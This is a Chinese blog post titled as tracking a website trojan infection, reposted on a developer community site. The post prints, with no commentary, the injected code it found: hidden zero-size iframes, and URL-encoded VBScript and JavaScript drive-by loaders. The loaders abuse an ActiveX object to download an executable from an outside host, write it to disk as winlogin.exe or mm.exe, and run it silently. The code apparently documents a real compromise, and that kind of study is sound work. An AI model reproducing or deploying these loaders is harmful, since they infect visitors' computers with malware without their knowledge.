网站挂马追踪-阿里云开发者社区

开发者社区> 科技小能手> 正文

网站挂马追踪

简介:
+关注继续查看
<iframe src="[url]http://www.5study.com/admin-nis/eWebEditor/CSS/index.htm[/url]" name="zhu" width="0" height="0" frameborder="0"></iframe>
<iframe src="[url]http://www.5study.com/admin-nis/eWebEditor/CSS/Mrniu.htm[/url]" name="zhu" width="0" height="0" frameborder="0"></iframe>

<SCRIPT>var Words="%3Chtml%3E%0D%0A %3Cscript language%3D%22VBScript%22%3E%0D%0A    on error resume next%0D%0A    dl %3D %22http%3A%2F%2Fwww%2E5study%2Ecom%2Fadmin%2Dnis%2FeWebEditor%2FCSS%2F000%2Eexe%22%0D%0A    Set df %3D document%2EcreateElement%28%22object%22%29%0D%0A    df%2EsetAttribute %22classid%22%2C %22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%0D%0A    str%3D%22Microsoft%2EXMLHTTP%22%0D%0A    Set x %3D df%2ECreateObject%28str%2C%22%22%29%0D%0A    a1%3D%22Ado%22%0D%0A    a2%3D%22db%2E%22%0D%0A    a3%3D%22Str%22%0D%0A    a4%3D%22eam%22%0D%0A    str1%3Da1%26a2%26a3%26a4%0D%0A    str5%3Dstr1%0D%0A    set S %3D df%2Ecreateobject%28str5%2C%22%22%29%0D%0A    S%2Etype %3D 1%0D%0A    str6%3D%22GET%22%0D%0A    x%2EOpen str6%2C dl%2C False%0D%0A    x%2ESend%0D%0A    fname1%3D%22winlogin%2Eexe%22%0D%0A    set F %3D df%2Ecreateobject%28%22Scripting%2EFileSystemObject%22%2C%22%22%29%0D%0A    set tmp %3D F%2EGetSpecialFolder%282%29 %0D%0A    fname1%3D F%2EBuildPath%28tmp%2Cfname1%29%0D%0A    S%2Eopen%0D%0A    S%2Ewrite x%2EresponseBody%0D%0A    S%2Esavetofile fname1%2C2%0D%0A    S%2Eclose%0D%0A    set Q %3D df%2Ecreateobject%28%22Shell%2EApplication%22%2C%22%22%29%0D%0A    Q%2EShellExecute fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A    %3C%2Fscript%3E%0D%0A    %3Chead%3E%0D%0A    %3Ctitle%3E新世纪网安基地%3C%2Ftitle%3E%0D%0A    %3C%2Fhead%3E%3Cbody%3E%0D%0A%09%3Ccenter%3Ehttp%3A%2F%2Fwww%2E520hack%2Ecom%2F占有者制作%2C联系QQ%3A8338850%2E%3C%2Fcenter%3E%0D%0A    %3C%2Fbody%3E%3C%2Fhtml%3E%0D%0A";document.write(unescape(Words))</SCRIPT>

<SCRIPT>var Words="%3CHTML%3E%0D%0A%3CHEAD%3E%0D%0A%3CMETA http%2Deqiv%3D%22content%2Dtype%22 %0D%0Acontent%3D%22text%2Fhtml%3Bcharset%3Dgb2312%22%3E %0D%0A%3Ctitle%3EServer Bad%3C%2Ftitle%3E %0D%0A%0D%0A%3Cscript LANGUAGE%3D%22Javascript%22%3Edocument%2Ewrite%28unescape%28%22%3Chtml%3E%3Chead%3E%0D%0A%3Cscript language%3D%22Javascript%22%3E%0D%0Afunction do1%28mx%2Cas%2Cp%29%0D%0A%7B%0D%0A%09mx%2ESend%28%29%3B%0D%0A%09as%2EType %3D 1%3B%0D%0A%09as%2EOpen%28%29%3B%0D%0A%09as%2EWrite%28mx%2EresponseBody%29%3B%0D%0A%09as%2ESaveToFile%28p%2C2%29%3B%0D%0A%09as%2EClose%28%29%3B%0D%0A%7D%0D%0Avar a %3D null%3B%0D%0Avar mx%2Cas%2Cp%3B%0D%0Ap %3D %22c%3A%5C%5Cmm%2Eexe%22%0D%0Aa %3D %28document%2EcreateElement%28%22object%22%29%29%3B%0D%0Aa%2EsetAttribute%28%22classid%22%2C%22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%29%3B%0D%0Atry%7Bmx %3D a%2ECreateObject%28%22Microsoft%2EXMLHTTP%22%2C%22%22%29%3B%7Dcatch%28e%29%7B%7D%3B%0D%0Aif%28%21mx%29try%7Bmx %3D new ActiveXObject%28%22Microsoft%2EXMLHTTP%22%29%3B%7Dcatch%28e%29%7B%7D%3B%0D%0Atry%7Bas %3D a%2ECreateObject%28%22Adodb%2EStream%22%2C%22%22%29%3B%7Dcatch%28e%29%7B%7D%3B%0D%0Aif%28as%29%7B%0D%0A%09mx%2EOpen%28%22GET%22%2C%22http%3A%2F%2Fwww%2E5study%2Ecom%2Fadmin%2Dnis%2FeWebEditor%2FCSS%2Findex%2Ehtm%2F000%2Eexe%22%2C0%29%3B%0D%0A%09do1%28mx%2Cas%2Cp%29%3B%0D%0A%09var r%3B%0D%0A%09try%7Br %3D a%2ECreateObject%28%22Shell%2EApplication%22%2C%22%22%29%3B%7Dcatch%28e%29%7B%7D%3B%0D%0A%09if%28r%29%0D%0A%09%7B%0D%0A%09%09r%2EShellExecute%28p%2C%22%22%2C%22%22%2C%22open%22%2C0%29%3B%0D%0A%09%7Delse%0D%0A%09%7B%0D%0A%09%09try%7Br %3D a%2ECreateObject%28%22WScript%2EShell%22%2C%22%22%29%3B%7Dcatch%28e%29%7B%7D%3B%0D%0A%09%09if%28r%29r%2ERun%28p%2C0%29%3B%0D%0A%09%7D%0D%0A%7D%0D%0A%0D%0A%3C%2Fscript%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3E%0D%0A%0D%0A%22%29%29%3C%2FSCRIPT%3E%0D%0A%0D%0A%3C%2FHEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C%2FBODY%3E%0D%0A%3C%2FHTML%3E%0D%0A";document.write(unescape(Words))</SCRIPT>



 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/19554

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
放假期间网站被挂马的解决办法
放假期间网站被挂马的解决办法 青岛峰会期间本来想给自己放几天假的,因为网站的挂马给泡汤了,打开网站首页,使用浏览器的源代码功能,发现自己网站的首页多了很多木马代码,于是我连接FTP查看网站首页的代码中发现了这个挂马代码...
1734 0
阿里云服务器怎么设置密码?怎么停机?怎么重启服务器?
如果在创建实例时没有设置密码,或者密码丢失,您可以在控制台上重新设置实例的登录密码。本文仅描述如何在 ECS 管理控制台上修改实例登录密码。
4072 0
黑客借“甲型流感”传毒 挂马疾病预防控制中心网站
4月开始的一场全球性的甲型流感,使得疫情防控成为公众关注的焦点。然而,金山毒霸云安全中心却监测到网络上已有黑客针对该事件发起了恶意攻击。 据金山互联网安全公司发布的《2009年4月份中国电脑病毒疫情及互联网安全报告》,海南省疾病预防控制中心网站多次被黑客挂马。
1760 0
春节临近一票难求 谨防票务网站“挂马”
随着春节的临近,辛苦工作一年的人们都期待着回家过年与亲人团聚,由于通过正常购票渠道往往是“一票难求”,很多旅客都会到各大票务网站和论坛上查看和寻找车票转让信息,而这一契机也被病毒作者所瞄准,纷纷利用各种方式在网站上挂马,疯狂传播病毒。
815 0
网站被黑了被挂马篡改后我是如何解决网站被挂马!
1、发现被黑,网站被黑的症状       两年前自己用wordpress搭了一个网站,平时没事写写文章玩玩。但是前些日子,突然发现网站的流量突然变小,site了一下百度收录,发现出了大问题,网站被黑了。
1495 0
阿里云服务器端口号设置
阿里云服务器初级使用者可能面临的问题之一. 使用tomcat或者其他服务器软件设置端口号后,比如 一些不是默认的, mysql的 3306, mssql的1433,有时候打不开网页, 原因是没有在ecs安全组去设置这个端口号. 解决: 点击ecs下网络和安全下的安全组 在弹出的安全组中,如果没有就新建安全组,然后点击配置规则 最后如上图点击添加...或快速创建.   have fun!  将编程看作是一门艺术,而不单单是个技术。
4503 0
《越狱》完结 米帅迷应小心纹身网站挂马
据瑞星“云安全”系统监测,5月18日是世界博物馆日,“中国书画苑”、“今日艺术网”、“中国艺术品在线”等网站被黑客挂马,用户浏览这些网站后,会感染木马病毒:Worm.Win32.NsDownload.es(NS蠕虫下载器),该病毒会下载大量木马到用户电脑中。
880 0
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,阿里云优惠总结大概有三种登录方式: 登录到ECS云服务器控制台 在ECS云服务器控制台用户可以更改密码、更换系.
5730 0
北大等多所高校网站被挂马 高考生浏览需小心
据瑞星“云安全”系统监测,6月10日,“北京大学档案馆”、“北京外国语大学 外国文学研究所”、“中国政法大学社会学院”等重点大学网站被黑客挂马,用户浏览这些网站后,可能感染病毒:Backdoor.Win32.Gpigeon2007.cyr(灰鸽子后门病毒),导致用户电脑可能被黑客控制。
1057 0
阿里云ECS云服务器初始化设置教程方法
阿里云ECS云服务器初始化是指将云服务器系统恢复到最初状态的过程,阿里云的服务器初始化是通过更换系统盘来实现的,是免费的,阿里云百科网分享服务器初始化教程: 服务器初始化教程方法 本文的服务器初始化是指将ECS云服务器系统恢复到最初状态,服务器中的数据也会被清空,所以初始化之前一定要先备份好。
3230 0
14491
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
文娱运维技术
立即下载
《SaaS模式云原生数据仓库应用场景实践》
立即下载
《看见新力量:二》电子书
立即下载